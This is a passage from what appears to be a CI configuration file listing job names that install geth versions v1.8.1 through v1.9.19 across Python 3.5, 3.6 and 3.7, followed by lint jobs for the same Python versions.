      - py35-install-geth-v1.8.1
      - py36-install-geth-v1.8.1
      - py37-install-geth-v1.8.1

      - py35-install-geth-v1.8.2
      - py36-install-geth-v1.8.2
      - py37-install-geth-v1.8.2

      - py35-install-geth-v1.8.3
      - py36-install-geth-v1.8.3
      - py37-install-geth-v1.8.3

      - py35-install-geth-v1.8.4
      - py36-install-geth-v1.8.4
      - py37-install-geth-v1.8.4

      - py35-install-geth-v1.8.5
      - py36-install-geth-v1.8.5
      - py37-install-geth-v1.8.5

      - py35-install-geth-v1.8.6
      - py36-install-geth-v1.8.6
      - py37-install-geth-v1.8.6

      - py35-install-geth-v1.8.7
      - py36-install-geth-v1.8.7
      - py37-install-geth-v1.8.7

      - py35-install-geth-v1.8.8
      - py36-install-geth-v1.8.8
      - py37-install-geth-v1.8.8

      - py35-install-geth-v1.8.9
      - py36-install-geth-v1.8.9
      - py37-install-geth-v1.8.9

      - py35-install-geth-v1.8.10
      - py36-install-geth-v1.8.10
      - py37-install-geth-v1.8.10

      - py35-install-geth-v1.8.11
      - py36-install-geth-v1.8.11
      - py37-install-geth-v1.8.11

      - py35-install-geth-v1.8.12
      - py36-install-geth-v1.8.12
      - py37-install-geth-v1.8.12

      - py35-install-geth-v1.8.13
      - py36-install-geth-v1.8.13
      - py37-install-geth-v1.8.13

      - py35-install-geth-v1.8.14
      - py36-install-geth-v1.8.14
      - py37-install-geth-v1.8.14

      - py35-install-geth-v1.8.15
      - py36-install-geth-v1.8.15
      - py37-install-geth-v1.8.15

      - py35-install-geth-v1.8.16
      - py36-install-geth-v1.8.16
      - py37-install-geth-v1.8.16

      - py35-install-geth-v1.8.17
      - py36-install-geth-v1.8.17
      - py37-install-geth-v1.8.17

      - py35-install-geth-v1.8.18
      - py36-install-geth-v1.8.18
      - py37-install-geth-v1.8.18

      - py35-install-geth-v1.8.19
      - py36-install-geth-v1.8.19
      - py37-install-geth-v1.8.19

      - py35-install-geth-v1.8.20
      - py36-install-geth-v1.8.20
      - py37-install-geth-v1.8.20

      - py35-install-geth-v1.8.21
      - py36-install-geth-v1.8.21
      - py37-install-geth-v1.8.21

      - py35-install-geth-v1.8.22
      - py36-install-geth-v1.8.22
      - py37-install-geth-v1.8.22

      - py35-install-geth-v1.9.0
      - py36-install-geth-v1.9.0
      - py37-install-geth-v1.9.0

      - py35-install-geth-v1.9.1
      - py36-install-geth-v1.9.1
      - py37-install-geth-v1.9.1

      - py35-install-geth-v1.9.2
      - py36-install-geth-v1.9.2
      - py37-install-geth-v1.9.2

      - py35-install-geth-v1.9.3
      - py36-install-geth-v1.9.3
      - py37-install-geth-v1.9.3

      - py35-install-geth-v1.9.4
      - py36-install-geth-v1.9.4
      - py37-install-geth-v1.9.4

      - py35-install-geth-v1.9.5
      - py36-install-geth-v1.9.5
      - py37-install-geth-v1.9.5

      - py35-install-geth-v1.9.6
      - py36-install-geth-v1.9.6
      - py37-install-geth-v1.9.6

      - py35-install-geth-v1.9.7
      - py36-install-geth-v1.9.7
      - py37-install-geth-v1.9.7

      - py35-install-geth-v1.9.8
      - py36-install-geth-v1.9.8
      - py37-install-geth-v1.9.8

      - py35-install-geth-v1.9.9
      - py36-install-geth-v1.9.9
      - py37-install-geth-v1.9.9

      - py35-install-geth-v1.9.10
      - py36-install-geth-v1.9.10
      - py37-install-geth-v1.9.10

      - py35-install-geth-v1.9.11
      - py36-install-geth-v1.9.11
      - py37-install-geth-v1.9.11

      - py35-install-geth-v1.9.12
      - py36-install-geth-v1.9.12
      - py37-install-geth-v1.9.12

      - py35-install-geth-v1.9.13
      - py36-install-geth-v1.9.13
      - py37-install-geth-v1.9.13

      - py35-install-geth-v1.9.14
      - py36-install-geth-v1.9.14
      - py37-install-geth-v1.9.14

      - py35-install-geth-v1.9.15
      - py36-install-geth-v1.9.15
      - py37-install-geth-v1.9.15

      - py35-install-geth-v1.9.16
      - py36-install-geth-v1.9.16
      - py37-install-geth-v1.9.16

      - py35-install-geth-v1.9.17
      - py36-install-geth-v1.9.17
      - py37-install-geth-v1.9.17

      - py35-install-geth-v1.9.18
      - py36-install-geth-v1.9.18
      - py37-install-geth-v1.9.18

      - py35-install-geth-v1.9.19
      - py36-install-geth-v1.9.19
      - py37-install-geth-v1.9.19

      - py35-lint
      - py36-lint
      - py37-lint
